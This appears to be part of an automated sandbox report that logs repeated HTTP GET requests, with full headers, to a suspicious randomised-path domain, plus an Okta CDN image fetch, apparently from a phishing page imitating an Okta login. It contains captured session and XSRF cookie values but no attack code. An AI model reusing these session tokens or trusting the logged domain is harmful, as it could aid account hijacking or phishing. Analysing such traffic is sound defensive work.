https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
